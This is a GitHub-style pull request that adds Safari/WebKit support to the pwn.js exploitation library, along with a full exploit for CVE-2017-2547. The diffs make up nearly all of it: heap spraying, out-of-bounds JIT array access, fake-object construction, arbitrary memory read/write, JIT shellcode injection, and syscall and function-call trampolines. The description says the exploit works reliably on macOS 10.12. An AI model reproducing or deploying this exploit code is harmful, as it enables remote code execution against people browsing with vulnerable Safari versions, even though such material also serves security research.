### PR TITLE
- Added support for Safari, and added an example for CVE-2017-2547

### DIFF
--- a/examples/webkit-CVE-2017-2547.js
+++ b/examples/webkit-CVE-2017-2547.js
@@ -1,0 +1,106 @@
+// Original exploit from singi @ Theori : https://github.com/theori-io/zer0con2018_singi
+// Improved version by Externalist. Saw lots of room for improvement so did a complete Facelift. Enhanced reliablity, removed all offset dependencies to make it compatible with various browser versions, used a different exploitation technique, created pwnjs webkit prototype, Took care of process continuation, Made the code clean & concise & verbose, etc etc...
+
+var Exploit = (function() {
+    var WebkitExploit = pwnjs.WebkitExploit,
+        Integer = pwnjs.Integer
+
+    function Exploit() {
+        WebkitExploit.call(this);
+
+        var reference_index = -0x7c000000;              // Value that worked best for me. It attempts to index backwards but strangely, when applied to ArrayBuffers, it actually indexes forward by a whooping 0x400000000 bytes(16 gigs)! We can slash that to half(0x200000000 - 8 gigs) by referencing the biggest negative number possible.
+        negative_index_array = new Uint32Array(0x10);   // For some odd reason, putting a 'var' in front of this will break the bug trigger
+        var gigabyte_spray_arrays = [];
+        var jit_function = new Function();
+        
+        function log(str) {
+            document.write('<b style="font-size:150%;">[*] ' + str + '</b> <br />');
+        }
+
+        function relative_read(index){
+            jit_function = new Function(`
+                var reference_array = negative_index_array;
+                for (var i=0; i<0x100000; ++i) parseInt();
+                reference_array[1];
+
+                var retval = reference_array[` + (reference_index + index) + `];
+                return retval;`);
+
+            return jit_function();
+        }
+
+        function relative_write(index, value){
+            jit_function = new Function(`
+                var reference_array = negative_index_array;
+                for (var i=0; i<0x100000; ++i) parseInt();
+                reference_array[1];
+
+                reference_array[` + (reference_index + index) + `] = ` + value + `;`);
+
+            jit_function();
+        }
+
+        // This is going to spray 8 gigabytes on the Safari Memory. This is to push the subsequent allocations 8 gigabytes further away from 'negative_index_array'.
+        for(var i=0; i<4; i++) {
+            gigabyte_spray_arrays[i] = new Uint8Array(0x7fffff00);
+        }
+        this.dgc();  // I don't know why but sometimes, the allocation would be 'scheduled' to happen in the future and mess up the allocation order(I thought everything happens in a single thread apart from GC & JIT compiling & Workers & Asynchronous stuff...?). This is to just make sure that the 8 gigabyte allocation precedes the sprayed arrays.
+
+        // Spray a bunch of target arrays
+        spray_count = 0x400000;
+        var spray_arrays = new Array(spray_count);
+        spray_arrays.fill(0);      // To pre-allocate the Array, otherwise it would try to grow continously and create interfering allocations
+        // Spraying a 60 element array is enough to create lots of 60MB space "cusion" in order to avoid the unmmapped holes inbetween (which would induce a crash if the relative read unluckily lands there)
+        for(var i=0; i<spray_count; i++) {
+            spray_arrays[i] = [ 0x13371337, i, this.misalign_object, 0x13371337, i, this.misalign_object, 0x13371337, i, this.misalign_object, 0x13371337, i, this.misalign_object, 0x13371337, i, this.misalign_object, 
+                                0x13371337, i, this.misalign_object, 0x13371337, i, this.misalign_object, 0x13371337, i, this.misalign_object, 0x13371337, i, this.misalign_object, 0x13371337, i, this.misalign_object, 
+                                0x13371337, i, this.misalign_object, 0x13371337, i, this.misalign_object, 0x13371337, i, this.misalign_object, 0x13371337, i, this.misalign_object, 0x13371337, i, this.misalign_object, 
+                                0x13371337, i, this.misalign_object, 0x13371337, i, this.misalign_object, 0x13371337, i, this.misalign_object, 0x13371337, i, this.misalign_object, 0x13371337, i, this.misalign_object ];
+        }
+
+        var leet_index, spray_array_relative_index, object_index;
+        var spray_array_index;
+        var object_addr_low, object_addr_high;
+        for(var i=0; i<10; i++){
+            var leaked_value = relative_read(i*2);
+            if(leaked_value == 0x13371337){
+                leet_index = i*2;
+                break;
+            }
+        }
+
+        spray_array_relative_index = leet_index + 2;        // index & object is always behind 0x13371337 even in the last element
+        object_index = leet_index + 4;
+
+        spray_array_index = relative_read(spray_array_relative_index);  // I pegged the index in there so that I only have to search in a one-dimensional array
+        object_addr_low = relative_read(object_index);      // Retrieving the absolute address of 'this.misalign_object'
+        object_addr_high = relative_read(object_index+1);
+        relative_write(leet_index, 0x41414141);             // Modifying one of the 0x1337 in the array
+
+        // Searching through the array to find which 0x1337 was modified
+        var idx1 = spray_array_index, idx2;
+        for(var i=0; i <spray_arrays[idx1].length; i++){
+            if(spray_arrays[idx1][i] == 0x41414141){
+                idx2 = i+2;
+                break;
+            }
+        }
+
+        relative_write(object_index, object_addr_low + 0x10);   // Misalign yo, the de facto trick
+        var fake_object = spray_arrays[idx1][idx2];
+
+        // Don't let the GC monster get ya! :D
+        spray_arrays[idx1][idx2] = 0;
+
+        // Setup arbitrary read/write primitives. All you need to do is provide the misaligned object and the prototype take cares of the rest
+        this.initWebkit(fake_object);
+        fake_object = 0;    // just in case
+    }
+    Exploit.prototype = Object.create(WebkitExploit.prototype);
+    Exploit.prototype.constructor = Exploit;
+
+    // No need to define these. The 'WebkitExploit' prototype does it for you!
+    // Exploit.prototype.read = function (address, size) {};
+    // Exploit.prototype.write = function (address, value, size) {};
+    return Exploit;
+})();

--- a/examples/webkit.html
+++ b/examples/webkit.html
@@ -16,11 +16,18 @@
             }
 
             with (exploit) {
-                alert("foo : " + addressOf( {a:1} ).toString(16));
-                alert("bar : " + addressOfArrayBuffer(new Uint32Array(0x10)).toString(16));
+                log("Get the address of a JSObject : 0x" + addressOf( {a:1} ).toString(16));
+                log("Get the underlying vector address of an ArrayBuffer : 0x" + addressOfArrayBuffer(new Uint32Array(0x10)).toString(16));
 
-                var shellcode = [ 0xCC, 0xCC, 0xCC, 0xCC ];
-                writeAndCallJIT(shellcode);
+                var shellcode = [ 0x48, 0xB8, 0x41, 0x41, 0x41, 0x41, 0x00, 0x00, 0xFF, 0xFF, 0xC3 ];   // mov rax, 0xffff000041414141; ret;
+                var retval = writeAndCallJIT(shellcode);
+                log("Shellcode execution success!");
+                log("Return value : 0x" + retval.toString(16));
+                log("Calling an arbitrary function with user controlled arguments...");
+                call(gadgets.return, 1, 2, 3, 4, 5, 6);
+                log("Success!");
+                // call(new Integer(0x41414141, 0x43434343), 1, 2, 3, 4, 5, 6);
+                // syscall(0x1234, 1, 2, 3, 4, 5, 6);
             }
         </script>
     </body>

--- a/examples/webkit.html
+++ b/examples/webkit.html
@@ -1,0 +1,27 @@
+<!doctype html>
+<html>
+    <body>
+        <pre id="content"></pre>
+
+        <script src="../dist/pwn.js"></script>
+        <script src="webkit-CVE-2017-2547.js"></script>
+        <script>
+            function log(s) { document.getElementById('content').innerHTML += s + '<br>'; }
+
+            try {
+                var exploit = new Exploit();
+            } catch(e) {
+                log('Exploit failed: ' + e + '. Refreshing.');
+                document.location.href = document.location.href;
+            }
+
+            with (exploit) {
+                alert("foo : " + addressOf( {a:1} ).toString(16));
+                alert("bar : " + addressOfArrayBuffer(new Uint32Array(0x10)).toString(16));
+
+                var shellcode = [ 0xCC, 0xCC, 0xCC, 0xCC ];
+                writeAndCallJIT(shellcode);
+            }
+        </script>
+    </body>
+</html>

--- a/examples/webkit.html
+++ b/examples/webkit.html
@@ -20,14 +20,13 @@
                 log("Get the underlying vector address of an ArrayBuffer : 0x" + addressOfArrayBuffer(new Uint32Array(0x10)).toString(16));
 
                 var shellcode = [ 0x48, 0xB8, 0x41, 0x41, 0x41, 0x41, 0x00, 0x00, 0xFF, 0xFF, 0xC3 ];   // mov rax, 0xffff000041414141; ret;
-                var retval = writeAndCallJIT(shellcode);
+                writeAndCallJIT(shellcode);
                 log("Shellcode execution success!");
-                log("Return value : 0x" + retval.toString(16));
                 log("Calling an arbitrary function with user controlled arguments...");
                 call(gadgets.return, 1, 2, 3, 4, 5, 6);
-                log("Success!");
-                // call(new Integer(0x41414141, 0x43434343), 1, 2, 3, 4, 5, 6);
-                // syscall(0x1234, 1, 2, 3, 4, 5, 6);
+                var returnBuffer = new Uint32Array(0x10);
+                syscall(294, addressOfArrayBuffer(returnBuffer));       // shared_region_check_np
+                log('dyld shared cache base : ' + Uint64Ptr.cast(addressOfArrayBuffer(returnBuffer))[0].toString(16));
             }
         </script>
     </body>

--- a/src/index.js
+++ b/src/index.js
@@ -2,6 +2,7 @@ import BaseExploit from "baseexploit";
 import ChakraExploit from "chakraexploit";
 import ChakraThreadExploit from "chakrathreadexploit";
 import ChromeExploit from "chromeexploit";
+import WebkitExploit from "webkitexploit";
 import Integer from "integer";
 
 export {
@@ -9,5 +10,6 @@ export {
     ChakraExploit,
     ChakraThreadExploit,
     ChromeExploit,
+    WebkitExploit,
     Integer
 };

--- a/src/webkitexploit.js
+++ b/src/webkitexploit.js
@@ -1,0 +1,219 @@
+import BaseExploit from "baseexploit";
+import Integer from "integer";
+
+/**
+ * Constructs an exploit with sensible defaults for Webkit. Child must call initChrome method with a successfully an object that's successfully misaligned.
+ *
+ * @augments BaseExploit
+ * @class
+ * @constructor
+ */
+function WebkitExploit() {
+    var exploit = this;
+    BaseExploit.call(this, 64);
+
+    this.broughtToYouBy = 'Externalist';
+    this.pressure = new Array(100);
+    this.master = new Uint32Array(0x1000);
+    this.slave = new Uint32Array(0x1000);
+    this.leakval_u32 = new Uint32Array(0x1000);
+    this.leakval_helper = [this.slave, 2, 3, 4, 5, 6, 7, 8, 9, 10];
+    this.misalign_object = {'a':this.u2d(2048, 0x602300), 'b':this.u2d(0,0), 'c':this.leakval_helper, 'd':this.u2d(0x1337,0)};
+    this.butterfly = 0;
+    this.addr_to_slavebuf = 0;
+
+    function makeid() {
+        var text = "";
+        var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
+
+        for (var i = 0; i < 8; i++)
+            text += possible.charAt(Math.floor(Math.random() * possible.length));
+
+        return text;
+    };
+
+    this.instancespr = [];
+    for (var i = 0; i < 4096; i++) {
+        this.instancespr[i] = new Uint32Array(1);
+        this.instancespr[i][makeid()] = 50057; /* spray 4-field Object InstanceIDs */
+    }
+}
+WebkitExploit.prototype = Object.create(BaseExploit.prototype);
+WebkitExploit.prototype.constructor = WebkitExploit;
+
+// In case you want to invoke the Garbage Collector
+WebkitExploit.prototype.dgc = function(){
+    for (var i = 0; i < this.pressure.length; i++) {
+        this.pressure[i] = new Uint32Array(0x10000);
+    }
+}
+
+// Convert Uint64 into an equivalent Floating Point representation
+WebkitExploit.prototype.u2d = function(low, hi) {
+    var _dview = new DataView(new ArrayBuffer(16));
+    _dview.setUint32(0, hi);
+    _dview.setUint32(4, low);
+    return _dview.getFloat64(0);
+}
+
+// The inverse of the above
+WebkitExploit.prototype.d2u = function(d) {
+    var _dview = new DataView(new ArrayBuffer(16));
+    _dview.setFloat64(0, d);
+    return { lo: _dview.getUint32(4), hi: _dview.getUint32(0) };    
+}
+
+// Be careful when using this. Looping intensively could summon the GC
+WebkitExploit.prototype.sleep = function(milliseconds) {
+    var start = new Date().getTime();
+    while (new Date().getTime() < start + milliseconds);
+}
+
+/**
+ * Initializes Webkit helpers using memory read and write.
+ *
+ * @param {Integer|Pointer} fake_object A successfully misaligned object
+ */
+WebkitExploit.prototype.initWebkit = function(fake_object) {
+    this.misalign_object.c = this.leakval_helper;
+    this.butterfly = new Integer(fake_object[2], fake_object[3], true);
+
+    this.misalign_object.c = this.leakval_u32;
+    var lkv_u32_old = new Integer(fake_object[4], fake_object[5], true);
+    fake_object[4] = this.butterfly.low;
+    fake_object[5] = this.butterfly.high;
+
+    this.misalign_object.c = this.master;
+    fake_object[4] = this.leakval_u32[0];
+    fake_object[5] = this.leakval_u32[1];
+
+    this.addr_to_slavebuf = new Integer(this.master[4], this.master[5], true);
+    this.misalign_object.c = this.leakval_u32;
+    fake_object[4] = lkv_u32_old.low;
+    fake_object[5] = lkv_u32_old.high;
+
+    // Don't let GC ruin the party :)
+    fake_object = 0;
+    this.misalign_object.c = 0;
+
+    // Get the JIT code address from a function object
+    var trycatch = "";
+    for(var z=0; z<0x2000; z++) trycatch += "try{} catch(e){}; ";
+    this.fc = new Function(trycatch);
+    for(var z=0; z<1000; z++) {         // Don't loop too excessively, otherwise FTL will kick in and wipe out the address from the object and start to hardcode call destinations
+        this.fc();
+    }
+    this.jitCode = this.Uint8Ptr.cast(this.Uint64Ptr.cast(this.Uint64Ptr.cast(this.Uint64Ptr.cast(this.addressOf(this.fc))[3])[3])[2]);     // These indexs may change slightly from version to version. I remember one being 3-2-2 on a different version. It'd be better to implement a hueristic logic but whatever... :D
+
+    // Get the JavaScriptCore library base address. I could have gone further all the way down to the dyld_shared_cache base but 'shared_region_check_np' has got me covered so I stop here :)
+    var parseFloatAddress = this.Uint64Ptr.cast(this.Uint64Ptr.cast(this.addressOf(parseFloat))[3])[7].and(new Integer(0xFFF, 0, true).not());
+    while(this.read(parseFloatAddress, 32) != 0xfeedfacf) {
+        parseFloatAddress = parseFloatAddress.sub(0x1000);
+    }
+    this.javaScriptCoreBase = parseFloatAddress;
+}
+
+// The arbitrary read function
+WebkitExploit.prototype.read = function (address, size) {
+    this.master[4] = address.low;
+    this.master[5] = address.high;
+
+    var rtv = new Integer(this.slave[0], this.slave[1], true, size);
+
+    this.master[4] = this.addr_to_slavebuf.low;
+    this.master[5] = this.addr_to_slavebuf.high;
+
+    return rtv;
+}
+
+// The arbitrary write function
+WebkitExploit.prototype.write = function (address, value, size) {
+    this.master[4] = address.low;
+    this.master[5] = address.high;
+
+    switch (size) {
+        case 8 : this.slave[0] = (this.slave[0] & 0xFFFFFF00) +  (value.low & 0xFF);
+        case 16: this.slave[0] = (this.slave[0] & 0xFFFF0000) +  (value.low & 0xFFFF);
+        case 32: this.slave[0] = value.low | 0;
+        case 64: this.slave[0] = value.low; 
+                 this.slave[1] = value.high;
+    }
+
+    this.master[4] = this.addr_to_slavebuf.low;
+    this.master[5] = this.addr_to_slavebuf.high;
+}
+
+/**
+ * Returns the address of a Javascript object.
+ *
+ * @param {*} obj Any Javascript object
+ * @returns {Pointer}
+ */
+WebkitExploit.prototype.addressOf = function (obj) {
+    this.leakval_helper[0] = obj;
+    var rtv = this.read(this.butterfly, 64);
+    this.write(this.butterfly, new Integer(0x41414141, 0xffff0000, true), 64);
+
+    return rtv;
+}
+
+/**
+ * Creates a fake Javascript object that lies in the address 'fakeObjectAddr'
+ *
+ * @param {*} fakeObjectAddr Address of a fake Javascript object
+ * @returns {JSObject}
+ */
+WebkitExploit.prototype.createFakeObject = function (fakeObjectAddr) {
+    this.write(this.butterfly, fakeObjectAddr);
+    var rt = this.leakval_helper[0];
+    this.write(this.butterfly, new int64(0x41414141, 0xffff0000));
+    return rt;
+}
+
+/**
+ * Returns the address of ArrayBuffer contents.
+ *
+ * @param {ArrayBuffer} ab ArrayBuffer
+ * @returns {Pointer}
+ */
+WebkitExploit.prototype.addressOfArrayBuffer = function (ab) {
+    var p = this.Uint64Ptr.cast(this.addressOf(ab));
+    return p[2];
+}
+
+// Not really needed as of now. Just leaving an empty function here in case a need rises in the future
+/**
+ * Returns the address of a Javascript object. Internal.
+ *
+ * @param {*} obj Any Javascript object
+ * @returns {Pointer}
+ */
+WebkitExploit.prototype.addressOfSlow = function (obj) {
+
+}
+
+// TODO
+/**
+ * Call a function pointer with the given arguments. Used internally by FunctionPointer.
+ *
+ * @param {Integer} address
+ * @param {...Integer} args
+ * @returns {Integer}
+ */
+WebkitExploit.prototype.call = function (address, ...args) {
+    var self = this;
+}
+
+/**
+ * Writes shellcode onto the JIT and call into it
+ *
+ * @param {Integer} shellcode
+ */
+WebkitExploit.prototype.writeAndCallJIT = function (shellcode) {
+    for(var i=0; i<shellcode.length; i++){
+        this.jitCode[i] = shellcode[i];
+    }
+    this.fc();
+}
+
+export default WebkitExploit;

--- a/src/webkitexploit.js
+++ b/src/webkitexploit.js
@@ -13,6 +13,7 @@ function WebkitExploit() {
     BaseExploit.call(this, 64);
 
     this.broughtToYouBy = 'Externalist';
+    this.nogc = []
     this.pressure = new Array(100);
     this.master = new Uint32Array(0x1000);
     this.slave = new Uint32Array(0x1000);
@@ -111,6 +112,53 @@ WebkitExploit.prototype.initWebkit = function(fake_object) {
         parseFloatAddress = parseFloatAddress.sub(0x1000);
     }
     this.javaScriptCoreBase = parseFloatAddress;
+
+    var gadgets = [
+        ['return', [ 0xC3 ]],
+        // ['syscallReturn', [ 0x0F, 0x05, 0xC3 ]]      // Couldn't find this or anything similar in JavaScriptCore
+    ];
+    this.gadgets = this.findGadgetsCustom(this.javaScriptCoreBase, gadgets);
+}
+
+// The findGadgets in the baseexploit.js only works for PE files. Therefore I reimplement it here(just a mere 3 line change). I didn't really want to touch the already well functioning basicexploit.js
+WebkitExploit.prototype.findGadgetsCustom = function (module, query) {
+    var p = this.Uint8Ptr.cast(module);
+    var codeSize = 0x10000;     // Just hardcoded this into 0x10000 for now. We'd have to parse the mach-o header and walk each segment load command to get the text section addr & size but I was too sleepy at the moment
+    var array = new Int32Array(codeSize / 4);
+    var address = p.address.add(0x1000);
+    for (var i = 0x1000; i < codeSize; i += 8) {
+        var x = this.read(address, 64);
+        array[i / 4] = x.low;
+        array[i / 4 + 1] = x.high;
+        address.low += 8;
+        if ((address.low|0) == 0) {
+            address.high += 1;
+        }
+    }
+
+    var byteArray = new Uint8Array(array.buffer);
+    var gadgets = {};
+    query.forEach((gadget) => {
+        var name = gadget[0], bytes = gadget[1];
+        var idx = 0;
+        while (true) {
+            idx = byteArray.indexOf(bytes[0], idx);
+            if (idx < 0) {
+                throw 'missing gadget ' + name;
+            }
+            for (var j = 1; j < bytes.length; j++) {
+                if (bytes[j] >= 0 && byteArray[idx + j] != bytes[j]) {
+                    break;
+                }
+            }
+            if (j == bytes.length) {
+                break;
+            }
+            idx++;
+        }
+        gadgets[name] = p.add(idx);
+    });
+    return gadgets;
 }
 
 // The arbitrary read function
@@ -166,7 +214,7 @@ WebkitExploit.prototype.addressOf = function (obj) {
 WebkitExploit.prototype.createFakeObject = function (fakeObjectAddr) {
     this.write(this.butterfly, fakeObjectAddr);
     var rt = this.leakval_helper[0];
-    this.write(this.butterfly, new int64(0x41414141, 0xffff0000));
+    this.write(this.butterfly, new int64(0x41414141, 0xffff0000, true));
     return rt;
 }
 
@@ -192,7 +240,7 @@ WebkitExploit.prototype.addressOfSlow = function (obj) {
 
 }
 
-// TODO
+// Fow now, the max cap of argument counts is 6.
 /**
  * Call a function pointer with the given arguments. Used internally by FunctionPointer.
  *
@@ -201,19 +249,105 @@ WebkitExploit.prototype.addressOfSlow = function (obj) {
  * @returns {Integer}
  */
 WebkitExploit.prototype.call = function (address, ...args) {
-    var self = this;
+    var slack_space_size = 0x1000;
+    var syscall_number_opcode = [], call_opcode = [];
+
+    if(address.syscallNumber == null){
+        call_opcode = [
+            0x48, 0xBB, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48,     // mov rbx, [marker]
+            0xFF, 0xD3,                                 // call rbx
+            0xC9,                                       // leave
+            0xC3                                        // ret
+        ];
+    }
+    else{
+        syscall_number_opcode = [ 0x48, 0xC7, 0xC0, 0x00, 0x00, 0x00, 0x00 ];
+        syscall_number_opcode[3] = ((address.syscallNumber & 0x000000FF) >> 0) & 0xFF;
+        syscall_number_opcode[4] = ((address.syscallNumber & 0x0000FF00) >> 8) & 0xFF;
+        syscall_number_opcode[5] = ((address.syscallNumber & 0x00FF0000) >> 16) & 0xFF;
+        syscall_number_opcode[6] = ((address.syscallNumber & 0xFF000000) >> 24) & 0xFF;
+        call_opcode = [
+            0x0F, 0x05,                                 // syscall
+            0xC9,                                       // leave
+            0xC3                                        // ret
+        ];
+    }
+
+    var buf_jmp = new Uint8Array(syscall_number_opcode.concat([
+        // 0xCC,     // Test breakpoint
+        0x55,                                       // push rbp
+        0x48, 0x89, 0xE5,                           // mov rbp, rsp
+        0x48, 0x83, 0xEC, 0x20,                     // sub rsp,0x20
+        0xE8, 0x00, 0x00, 0x00, 0x00                // call {after slack_space} - Don't edit the opcodes of this line. It'll break the search logic shortly after
+        ]));
+    var buf_filler = new Uint8Array(slack_space_size);
+    var buf_setup_args = new Uint8Array([
+        0x5B,                                       // pop rbx
+        0x48, 0x8B, 0x3B,                           // mov rdi, qword ptr [rbx]
+        0x48, 0x8B, 0x73, 0x08,                     // mov rsi, qword ptr [rbx+8]
+        0x48, 0x8B, 0x53, 0x10,                     // mov rdx, qword ptr [rbx+0x10]
+        0x48, 0x8B, 0x4B, 0x18,                     // mov rcx, qword ptr [rbx+0x18]
+        0x4C, 0x8B, 0x43, 0x20,                     // mov r8, qword ptr [rbx+0x20]
+        0x4C, 0x8B, 0x4B, 0x28                      // mov r9, qword ptr [rbx+0x28]
+        ].concat(call_opcode));
+
+    // set up the call destination address
+    for(var i=0; i<buf_jmp.length; i++) {
+        if(buf_jmp[i] == 0xE8 && buf_jmp[i+1] == 0 && buf_jmp[i+2] == 0 && buf_jmp[i+3] == 0 && buf_jmp[i+4] == 0) {
+            this.Uint32Ptr.cast(this.addressOfArrayBuffer(buf_jmp).add(i+1))[0] = slack_space_size;
+            break;
+        }
+    }
+
+    var argumentBufAddress = this.Uint64Ptr.cast(this.addressOfArrayBuffer(buf_filler));
+    for(var i=0; i<6; i++) {
+        if(i < args.length) {
+            argumentBufAddress[i] = args[i];
+        }
+    }
+
+    if(address.syscallNumber == null) {
+        for(var i=0; i<buf_setup_args.length; i++) {
+            if( buf_setup_args[i] == 0x48 && buf_setup_args[i+1] == 0xBB &&
+                buf_setup_args[i+2] == 0x41 && buf_setup_args[i+3] == 0x42 && buf_setup_args[i+4] == 0x43 && buf_setup_args[i+5] == 0x44 &&
+                buf_setup_args[i+6] == 0x45 && buf_setup_args[i+7] == 0x46 && buf_setup_args[i+8] == 0x47 && buf_setup_args[i+9] == 0x48 ) {
+                this.Uint64Ptr.cast(this.addressOfArrayBuffer(buf_setup_args).add(i+2))[0] = address;
+                break;
+            }
+        }
+    }
+
+    var shc = new Uint8Array(buf_jmp.length + buf_filler.length + buf_setup_args.length);
+    shc.set(buf_jmp);
+    shc.set(buf_filler, buf_jmp.length);
+    shc.set(buf_setup_args, buf_jmp.length + buf_filler.length);
+
+    return this.writeAndCallJIT(shc);
+}
+
+/**
+ * Call a syscall with the given arguments.
+ *
+ * @param {SMI} syscallNumber
+ * @param {...Integer} args
+ * @returns {Integer}
+ */
+WebkitExploit.prototype.syscall = function (syscallNumber, ...args) {
+    var address = new Integer(0, 0, true);
+    address.syscallNumber = syscallNumber + 0x20000000;
+    return this.call(address, ...args);
 }
 
 /**
  * Writes shellcode onto the JIT and call into it
  *
- * @param {Integer} shellcode
+ * @param {JSArray} shellcode
  */
 WebkitExploit.prototype.writeAndCallJIT = function (shellcode) {
     for(var i=0; i<shellcode.length; i++){
         this.jitCode[i] = shellcode[i];
     }
-    this.fc();
+    return this.fc();
 }
 
 export default WebkitExploit;

--- a/src/webkitexploit.js
+++ b/src/webkitexploit.js
@@ -255,9 +255,7 @@ WebkitExploit.prototype.call = function (address, ...args) {
     if(address.syscallNumber == null){
         call_opcode = [
             0x48, 0xBB, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48,     // mov rbx, [marker]
-            0xFF, 0xD3,                                 // call rbx
-            0xC9,                                       // leave
-            0xC3                                        // ret
+            0xFF, 0xD3                                                      // call rbx
         ];
     }
     else{
@@ -266,11 +264,7 @@ WebkitExploit.prototype.call = function (address, ...args) {
         syscall_number_opcode[4] = ((address.syscallNumber & 0x0000FF00) >> 8) & 0xFF;
         syscall_number_opcode[5] = ((address.syscallNumber & 0x00FF0000) >> 16) & 0xFF;
         syscall_number_opcode[6] = ((address.syscallNumber & 0xFF000000) >> 24) & 0xFF;
-        call_opcode = [
-            0x0F, 0x05,                                 // syscall
-            0xC9,                                       // leave
-            0xC3                                        // ret
-        ];
+        call_opcode = [ 0x0F, 0x05 ];                                // syscall
     }
 
     var buf_jmp = new Uint8Array(syscall_number_opcode.concat([
@@ -283,13 +277,19 @@ WebkitExploit.prototype.call = function (address, ...args) {
     var buf_filler = new Uint8Array(slack_space_size);
     var buf_setup_args = new Uint8Array([
         0x5B,                                       // pop rbx
+        0x53,                                       // push rbx
         0x48, 0x8B, 0x3B,                           // mov rdi, qword ptr [rbx]
         0x48, 0x8B, 0x73, 0x08,                     // mov rsi, qword ptr [rbx+8]
         0x48, 0x8B, 0x53, 0x10,                     // mov rdx, qword ptr [rbx+0x10]
         0x48, 0x8B, 0x4B, 0x18,                     // mov rcx, qword ptr [rbx+0x18]
         0x4C, 0x8B, 0x43, 0x20,                     // mov r8, qword ptr [rbx+0x20]
         0x4C, 0x8B, 0x4B, 0x28                      // mov r9, qword ptr [rbx+0x28]
-        ].concat(call_opcode));
+        ].concat(call_opcode).concat([
+        0x5B,                                       // pop rbx
+        0x48, 0x89, 0x03,                           // mov QWORD PTR [rbx],rax
+        0xC9,                                       // leave
+        0xC3                                        // ret
+        ]));
 
     // set up the call destination address
     for(var i=0; i<buf_jmp.length; i++) {
@@ -321,8 +321,11 @@ WebkitExploit.prototype.call = function (address, ...args) {
     shc.set(buf_jmp);
     shc.set(buf_filler, buf_jmp.length);
     shc.set(buf_setup_args, buf_jmp.length + buf_filler.length);
+    this.dgc();
 
-    return this.writeAndCallJIT(shc);
+    this.writeAndCallJIT(shc);
+
+    return this.Uint64Ptr.cast(this.Uint8Ptr.cast(this.jitCode).add(buf_jmp.length))[0];
 }
 
 /**
@@ -334,7 +337,7 @@ WebkitExploit.prototype.call = function (address, ...args) {
  */
 WebkitExploit.prototype.syscall = function (syscallNumber, ...args) {
     var address = new Integer(0, 0, true);
-    address.syscallNumber = syscallNumber + 0x20000000;
+    address.syscallNumber = syscallNumber + 0x2000000;
     return this.call(address, ...args);
 }
 
@@ -347,7 +350,7 @@ WebkitExploit.prototype.writeAndCallJIT = function (shellcode) {
     for(var i=0; i<shellcode.length; i++){
         this.jitCode[i] = shellcode[i];
     }
-    return this.fc();
+    this.fc();
 }
 
 export default WebkitExploit;

--- a/src/webkitexploit.js
+++ b/src/webkitexploit.js
@@ -321,7 +321,6 @@ WebkitExploit.prototype.call = function (address, ...args) {
     shc.set(buf_jmp);
     shc.set(buf_filler, buf_jmp.length);
     shc.set(buf_setup_args, buf_jmp.length + buf_filler.length);
-    this.dgc();
 
     this.writeAndCallJIT(shc);
 


### PR DESCRIPTION
Hi!

Recently I had some free time on my hands and had a look at @singi 's exploit from zer0con, and thought there was some room for improvement. So I set off to rebuild the exploit from scratch and while I was doing it, I wanted to take this opportunity to actually use `pwn.js` cause it's a very well organized, robust library, and I wanted to incorporate it in my future projects instead of blindly copy/pasting code from different places which makes it hard to maintain. I found out `webkitexploit.js` was not implemented yet so I created one along the way. The improved exploit `webkit-CVE-2017-2547.js` shows how to use the functionality in `webkitexploit.js`.

The exploit works flawlessly on a 10.12 & 10.12.3 VM even after extensive browsing sessions with contaminated memory.

Thanks for creating the awesome library and I hope this contribution helps! :)